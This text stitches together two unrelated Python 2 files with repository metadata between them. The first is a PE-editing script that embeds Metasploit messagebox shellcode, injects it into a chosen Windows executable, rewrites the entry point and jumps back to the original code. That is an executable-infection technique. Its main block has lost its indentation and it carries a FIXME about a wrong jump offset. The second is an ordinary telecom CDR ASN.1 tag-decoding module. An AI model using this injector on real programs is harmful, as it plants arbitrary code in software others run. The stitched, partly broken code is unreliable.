            # for an additional section header. Besides that it's checked if the 0x28 bytes
            # (size of one section header) after the last current section header are filled
            # with nulls/ are free to use.
            if ( self.pe.OPTIONAL_HEADER.SizeOfHeaders <
                section_table_offset + (self.pe.FILE_HEADER.NumberOfSections+1)*0x28
                or not self.__is_null_data(self.pe.get_data(section_table_offset +
                (self.pe.FILE_HEADER.NumberOfSections)*0x28, 0x28))):
                # Checking if more space can be added.
                # 0x1000 is used here as the assumed upper bound for headers;
                # beyond it the header area is considered full.
                if self.pe.OPTIONAL_HEADER.SizeOfHeaders < 0x1000:
                    self.__add_header_space()
                    print "Additional space to add a new section header was allocated."
                else:
                    raise SectionDoublePError("No more space can be added for the section header.")
            # The validity check of RawAddress is done after space for a new section header may
            # have been added because if space had been added the PointerToRawData of the previous
            # section would have changed.
            if (RawAddress != (self.pe.sections[-1].PointerToRawData +
                self.pe.sections[-1].SizeOfRawData)):
                RawAddress = \
                    (self.pe.sections[-1].PointerToRawData + self.pe.sections[-1].SizeOfRawData)
            # Appending the data of the new section to the file.
            if len(Data) > 0:
                self.pe.__data__ = self.pe.__data__[:] + Data
            section_offset = section_table_offset + self.pe.FILE_HEADER.NumberOfSections*0x28
            # Manually writing the data of the section header to the file.
            # Field offsets follow the IMAGE_SECTION_HEADER layout.
            self.pe.set_bytes_at_offset(section_offset, Name)
            self.pe.set_dword_at_offset(section_offset+0x08, VirtualSize)
            self.pe.set_dword_at_offset(section_offset+0x0C, VirtualAddress)
            self.pe.set_dword_at_offset(section_offset+0x10, RawSize)
            self.pe.set_dword_at_offset(section_offset+0x14, RawAddress)
            self.pe.set_dword_at_offset(section_offset+0x18, RelocAddress)
            self.pe.set_dword_at_offset(section_offset+0x1C, Linenumbers)
            self.pe.set_word_at_offset(section_offset+0x20, RelocationsNumber)
            self.pe.set_word_at_offset(section_offset+0x22, LinenumbersNumber)
            self.pe.set_dword_at_offset(section_offset+0x24, Characteristics)
            self.pe.FILE_HEADER.NumberOfSections +=1
            # Parsing the section table of the file again to add the new section to the sections
            # list of pefile.
            self.pe.parse_sections(section_table_offset)
            self.__adjust_optional_header()
        else:
            raise SectionDoublePError("The NumberOfSections specified in the file header and the " +
                "size of the sections list of pefile don't match.")
def print_section_info(pe):
    """ Prints every section header of the given pefile.PE instance, then
    disassembles the first bytes (up to 6) at the start of the last
    section with pydasm (32-bit mode, Intel syntax).
    """
    for section in pe.sections:
        print section
    # If you don't have pydasm installed comment the rest of the function out.
    print "The instructions at the beginning of the last section:"
    ep = pe.sections[-1].VirtualAddress
    # Absolute virtual address of the section start (for address display only).
    ep_ava = ep+pe.OPTIONAL_HEADER.ImageBase
    data = pe.get_memory_mapped_image()[ep:ep+6]
    offset = 0
    while offset < len(data):
        i = pydasm.get_instruction(data[offset:], pydasm.MODE_32)
        print pydasm.get_instruction_string(i, pydasm.FORMAT_INTEL, ep_ava+offset)
        # Advance by the decoded instruction's byte length.
        offset += i.length
# windows/messagebox - 265 bytes
# http://www.metasploit.com
# ICON=NO, TITLE=W00t!, EXITFUNC=process, VERBOSE=false,
# TEXT=
# Raw Metasploit payload that pops a Windows message box.  Before being
# injected it is wrapped below in pushad (\x60) / popad (\x61) plus a
# trailing jmp (\xe9) back toward the original entry point, so the host
# program's registers are preserved and execution continues normally.
sample_shell_code = ("\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +
"\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" +
"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d" +
"\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01" +
"\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" +
"\xe8\x89\x44\x24\x1c\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89" +
"\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45" +
"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff" +
"\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64" +
"\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56\xff\x55" +
"\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52\xe8" +
"\x61\xff\xff\xff\x68\x21\x58\x20\x20\x68\x57\x30\x30\x74" +
"\x31\xdb\x88\x5c\x24\x05\x89\xe3\x68\x65\x21\x58\x20\x68" +
"\x20\x48\x65\x72\x68\x20\x57\x61\x73\x68\x73\x69\x73\x78" +
"\x78\x78\x65\x62\x61\x31\xc9\x88\x4c\x24\x12\x89\xe1\x31" +
"\xd2\x52\x53\x51\x52\xff\xd0")
if __name__ == '__main__':
exe_file = raw_input('[*] Enter full path of the main executable :')
final_pe_file = raw_input('[*] Enter full path of the output executable :')
pe = PE(exe_file)
if (peutils.is_probably_packed(pe)):
print("[-] Packed binary .... nothing to be done yet")
exit()
OEP = pe.OPTIONAL_HEADER.AddressOfEntryPoint
print("[+] original entry point (OEP): " + str(OEP))
pe_section = pe.get_section_by_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
print("[+] getting section: " + str(pe_section))
align = pe.OPTIONAL_HEADER.SectionAlignment
what_left = (pe_section.VirtualAddress + pe_section.Misc_VirtualSize) - pe.OPTIONAL_HEADER.AddressOfEntryPoint
print("[+] Alignment: " + str(align) )
print("[+] Space where to inject: " +str(what_left) )
end_rva = pe.OPTIONAL_HEADER.AddressOfEntryPoint + what_left
padd = align - (end_rva % align)
e_offset = pe.get_offset_from_rva(end_rva+padd) - 1
scode_size = len(sample_shell_code)+7 #+7 because i need to popad everything as was before !
print("[+] End of Virtual Address: " + str(end_rva))
print("[+] Padding: " + str(padd))
print("[+] Offset: " + str(e_offset))
if padd < scode_size:
# Enough space is not available for shellcode
#TODO: using Library to Add new Section
print("[-] Not enough space into executable for injecting. You need to add a new section.. it's still in todo list")
sections = SectionDoubleP(pe)
print("[+] Adding new Section")
try:
jmp_to = OEP #FIXME: this is wrong.. we need the right offset !
sample_shell_code = '\x60%s\x61\xe9%s' % (sample_shell_code, pack('I', jmp_to & 0xffffffff))
sections.push_back(Characteristics=0x60000020, Data=sample_shell_code)
print("[+] Printing all sections !")
print_section_info(pe)
pe.write(filename=final_pe_file)
except SectionDoublePError as e:
print("[-] Error: " + e)
exit()
print("[+] Injecting code into section !")
# Code can be injected
scode_end_off = e_offset
scode_start_off = scode_end_off - scode_size
pe.OPTIONAL_HEADER.AddressOfEntryPoint = pe.get_rva_from_offset(scode_start_off)
print("[+] New Entry Point: " + str(pe.OPTIONAL_HEADER.AddressOfEntryPoint))
raw_pe_data = pe.write()
jmp_to = OEP - pe.get_rva_from_offset(scode_end_off)
print("[+] Dynamic Rebase Calculation ..")
sample_shell_code = '\x60%s\x61\xe9%s' % (sample_shell_code, pack('I', jmp_to & 0xffffffff))
print("[+] ShellCode Injected:")
print("==========================================")
print(sample_shell_code)
print("==========================================")
final_data = list(raw_pe_data)
final_data[scode_start_off:scode_start_off+len(sample_shell_code)] = sample_shell_code
final_data = ''.join(final_data)
raw_pe_data = final_data
pe.close()
new_file = open(final_pe_file, 'wb')
new_file.write(raw_pe_data)
new_file.close()
print '[*] Job Done! :)'
|
UTF-8
|
Python
| false | false | 2,014 |
8,469,675,510,089 |
681984d3f48e7c4a624c7bcc7995e4499a574c0f
|
3efa6e7c1959ed0e1442e3c0377bba2234c452e5
|
/stockholm/cdr/modules/custom_tags.py
|
a83cfde36d1f2d27f7fa56bd84f013ca85bc5784
|
[] |
no_license
|
SirBigData/stockholm
|
https://github.com/SirBigData/stockholm
|
b812e35bf9e3ee8522a74314a6a35bbab3ed254b
|
4c4176a45b79b9f4014226942e6c0ccd45aa4ad2
|
refs/heads/master
| 2020-12-25T06:08:04.156174 | 2014-08-01T12:32:58 | 2014-08-01T12:32:58 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
from stockholm.asn1.ber_decoder import Tag
def get_tbcd_string(byte_string):
    """Decode a TBCD (telephony BCD) byte string into its digit string.

    Each byte carries two digits: the low nibble comes first, then the
    high nibble.  A high nibble of 0xF is the filler marking an odd
    number of digits and is skipped.
    """
    digits = []
    for char in byte_string:
        value = ord(char)
        digits.append(str(value & 0x0F))
        high_nibble = value >> 4
        if high_nibble != 0x0F:
            digits.append(str(high_nibble))
    return "".join(digits)
def get_octet_string(byte_string, fill_zeros=0):
    """Render each byte as its decimal value, left-padded with zeros to
    *fill_zeros* characters, and concatenate the results."""
    parts = [str(ord(octet)).zfill(fill_zeros) for octet in byte_string]
    return "".join(parts)
def get_hex_string(byte_string):
    """Return the lowercase hexadecimal representation of *byte_string*,
    two hex digits per byte.

    BUGFIX/portability: the original used str.encode('hex'), a codec that
    only exists on Python 2; a "%02x" format per byte produces identical
    output and works on both interpreters.
    """
    return "".join("%02x" % ord(char) for char in byte_string)
def get_ascii(byte_string):
    """Encode *byte_string* as ASCII and return the result.

    Raises a UnicodeError if the input contains non-ASCII characters.
    """
    encoded = byte_string.encode('ascii')
    return encoded
def get_int(byte_string):
    """Interpret *byte_string* as a big-endian unsigned integer.

    An empty input raises ValueError (same as the original int('', 16)).

    BUGFIX/portability: the original relied on the Python-2-only
    str.encode('hex') codec; building the hex string with "%02x" per byte
    yields the same integer and also runs on Python 3.
    """
    hex_repr = "".join("%02x" % ord(char) for char in byte_string)
    return int(hex_repr, 16)
## Custom Tags
# --- Custom CDR field tags -------------------------------------------------
# Every class below represents one ASN.1 field of a CDR record and follows
# the same pattern: __init__ only supplies a default field name (used when
# the caller passes none) before delegating to Tag, and decode_value()
# converts the raw BER value bytes with one of the helper functions above
# (TBCD digits, decimal octets, hex, ASCII or integer).  Classes without a
# decode_value() inherit Tag's default decoding.
class AccountCode(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "accountCode"
        super(AccountCode, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        # TBCD-encoded digit string.
        return get_tbcd_string(byte_string)
class AddressString(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(AddressString, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_tbcd_string(byte_string)
class AddressStringExtended(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(AddressStringExtended, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        # Extended address strings are kept as raw hex.
        return get_hex_string(byte_string)
class AgeOfLocationEstimate(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "ageOfLocationEstimate"
        super(AgeOfLocationEstimate, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class AirInterfaceUserRate(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(AirInterfaceUserRate, self).__init__(header, byte_string, load_value, name)
class AoCCurrencyAmountSent(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "aoCCurrencyAmountSentToUser"
        super(AoCCurrencyAmountSent, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class ApplicationIdentifier(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(ApplicationIdentifier, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class AsyncSyncIndicator(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(AsyncSyncIndicator, self).__init__(header, byte_string, load_value, name)
class BearerServiceCode(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "bearerServiceCode"
        super(BearerServiceCode, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string,)
class BitRate(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(BitRate, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class BSSMAPCauseCode(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "bSSMAPCauseCode"
        super(BSSMAPCauseCode, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class CallAttemptState(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "callAttemptState"
        super(CallAttemptState, self).__init__(header, byte_string, load_value, name)
class CallIDNumber(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "callIdentificationNumber"
        super(CallIDNumber, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        # Big-endian integer value.
        return get_int(byte_string)
# (Same Tag-subclass pattern as the classes above.)
class CAMELTDPData(Tag): # TODO ojo es una secuencia  -- NOTE: this field is an ASN.1 SEQUENCE; sequence decoding is not implemented yet.
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(CAMELTDPData, self).__init__(header, byte_string, load_value, name)
class CarrierIdentificationCode(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "carrierIdentificationCode"
        super(CarrierIdentificationCode, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        # TBCD-encoded digit string.
        return get_tbcd_string(byte_string)
class CarrierInfo(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(CarrierInfo, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class CarrierInformation(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "carrierInformation"
        super(CarrierInformation, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class CarrierSelectionSubstitutionInformation(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "carrierSelectionSubstitutionInformation"
        super(CarrierSelectionSubstitutionInformation, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class CauseCode(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "causeCode"
        super(CauseCode, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class ChangeInitiatingParty(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "changeInitiatingParty"
        super(ChangeInitiatingParty, self).__init__(header, byte_string, load_value, name)
class CallPosition(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "callPosition"
        super(CallPosition, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_int(byte_string)
class ChannelAllocationPriorityLevel(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "channelAllocationPriorityLevel"
        super(ChannelAllocationPriorityLevel, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class ChannelCodings(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(ChannelCodings, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class ChargeAreaCode(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(ChargeAreaCode, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class ChargedParty(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "chargedParty"
        super(ChargedParty, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_int(byte_string)
class ChargeInformation(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "chargeInformation"
        super(ChargeInformation, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class ChargingCase(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "chargingCase"
        super(ChargingCase, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
# (Same Tag-subclass pattern as the classes above.)
class ChargingIndicator(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(ChargingIndicator, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class ChargingOrigin(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            # NOTE: class is ChargingOrigin but the CDR field name differs.
            name = "originForCharging"
        super(ChargingOrigin, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class ChargingUnitsAddition(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "chargingUnitsAddition"
        super(ChargingUnitsAddition, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class Counter(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(Counter, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class CRIIndicator(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "cRIIndicator"
        super(CRIIndicator, self).__init__(header, byte_string, load_value, name)
class CRIToMS(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "cRIToMS"
        super(CRIToMS, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_tbcd_string(byte_string)
class CUGIndex(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "cUGIndex"
        super(CUGIndex, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class CUGInterlockCode(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "cUGInterlockCode"
        super(CUGInterlockCode, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class C7CHTMessage(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(C7CHTMessage, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class C7ChargingMessage(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "c7ChargingMessage"
        super(C7ChargingMessage, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class Date(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(Date, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        # Dates need two digits per octet (zero-padded) to stay parseable.
        return get_octet_string(byte_string, 2)
class DecipheringKeys(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "decipheringKeys"
        super(DecipheringKeys, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class DefaultCallHandling(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "defaultCallHandling"
        super(DefaultCallHandling, self).__init__(header, byte_string, load_value, name)
class DefaultSMS_Handling(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "defaultSMSHandling"
        super(DefaultSMS_Handling, self).__init__(header, byte_string, load_value, name)
class DeliveryOfErroneousSDU(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(DeliveryOfErroneousSDU, self).__init__(header, byte_string, load_value, name)
# (Same Tag-subclass pattern as the classes above.)
class DisconnectingParty(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "disconnectingParty"
        super(DisconnectingParty, self).__init__(header, byte_string, load_value, name)
class Distributed(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(Distributed, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class EMLPPPriorityLevel(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "eMLPPPriorityLevel"
        super(EMLPPPriorityLevel, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class EndToEndAccessDataMap(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "endToEndAccessDataMap"
        super(EndToEndAccessDataMap, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class EosInfo(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "eosInfo"
        super(EosInfo, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class ErrorRatio(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(ErrorRatio, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class EventCRIToMS(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "eventCRIToMS"
        super(EventCRIToMS, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        # TBCD-encoded digit string.
        return get_tbcd_string(byte_string)
class ExchangeIdentity(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "exchangeIdentity"
        super(ExchangeIdentity, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        # Exchange identities are plain ASCII text.
        return get_ascii(byte_string)
class FaultCode(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "faultCode"
        super(FaultCode, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class FirstRadioChannelUsed(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "firstRadioChannelUsed"
        super(FirstRadioChannelUsed, self).__init__(header, byte_string, load_value, name)
class FixedNetworkUserRate(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(FixedNetworkUserRate, self).__init__(header, byte_string, load_value, name)
class FreeFormatData(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "freeFormatData"
        super(FreeFormatData, self).__init__(header, byte_string, load_value, name)
class FrequencyBandSupported(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "frequencyBandSupported"
        super(FrequencyBandSupported, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class GenericDigitsSet(Tag): # TODO Ojo ver  -- NOTE: decoding for this set type still to be reviewed/implemented.
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(GenericDigitsSet, self).__init__(header, byte_string, load_value, name)
class GenericNumbersSet(Tag): # TODO Ojo ver  -- NOTE: decoding for this set type still to be reviewed/implemented.
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(GenericNumbersSet, self).__init__(header, byte_string, load_value, name)
class GlobalCallReference(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "globalCallReference"
        super(GlobalCallReference, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
# (Same Tag-subclass pattern as the classes above.)
class GlobalTitle(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(GlobalTitle, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class GlobalTitleAndSubSystemNumber(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(GlobalTitleAndSubSystemNumber, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class GSMCallReferenceNumber(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "gSMCallReferenceNumber"
        super(GSMCallReferenceNumber, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        # Kept as raw hex.
        return get_hex_string(byte_string)
class IMEI(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(IMEI, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        # IMEI/IMEISV/IMSI identities are TBCD digit strings.
        return get_tbcd_string(byte_string)
class IMEISV(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(IMEISV, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_tbcd_string(byte_string)
class IMSI(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(IMSI, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_tbcd_string(byte_string)
class INMarkingOfMS(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "iNMarkingOfMS"
        super(INMarkingOfMS, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_int(byte_string)
class INServiceTrigger(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "iNServiceTrigger"
        super(INServiceTrigger, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class IntermediateRate(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "intermediateRate"
        super(IntermediateRate, self).__init__(header, byte_string, load_value, name)
class InternalCauseAndLoc(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "internalCauseAndLoc"
        super(InternalCauseAndLoc, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class IuCodec(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "iuCodec"
        super(IuCodec, self).__init__(header, byte_string, load_value, name)
class LCSAccuracy(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(LCSAccuracy, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class LCSClientType(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "lCSClientType"
        super(LCSClientType, self).__init__(header, byte_string, load_value, name)
class LCSDeferredEventType(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "lCSDeferredEventType"
        super(LCSDeferredEventType, self).__init__(header, byte_string, load_value, name)
class LegID(Tag):
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        super(LegID, self).__init__(header, byte_string, load_value, name)
    def decode_value(self, byte_string):
        return get_octet_string(byte_string)
class LevelOfCAMELService(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "levelOfCAMELService"
super(LevelOfCAMELService, self).__init__(header, byte_string, load_value, name)
class LocationCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "locationCode"
super(LocationCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class LocationEstimate(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "locationEstimate"
super(LocationEstimate, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class LocationInformation(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(LocationInformation, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_hex_string(byte_string)
class MessageReference(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "messageReference"
super(MessageReference, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class MessageTypeIndicator(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "messageTypeIndicator"
super(MessageTypeIndicator, self).__init__(header, byte_string, load_value, name)
class MiscellaneousInformation(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "miscellaneousInformation"
super(MiscellaneousInformation, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class MobileUserClass1(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "mobileUserClass1"
super(MobileUserClass1, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class MobileUserClass2(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "mobileUserClass2"
super(MobileUserClass2, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class MultimediaInformation(Tag):  # TODO: careful -- this is actually a SEQUENCE, not a primitive value
    # NOTE(review): no decode_value override here; value handling for the
    # sequence is presumably deferred to the Tag base class -- confirm.
    def __init__(self, header=None, byte_string=None, load_value=True, name=None):
        if not name:
            name = "multimediaInformation"
        super(MultimediaInformation, self).__init__(header, byte_string, load_value, name)
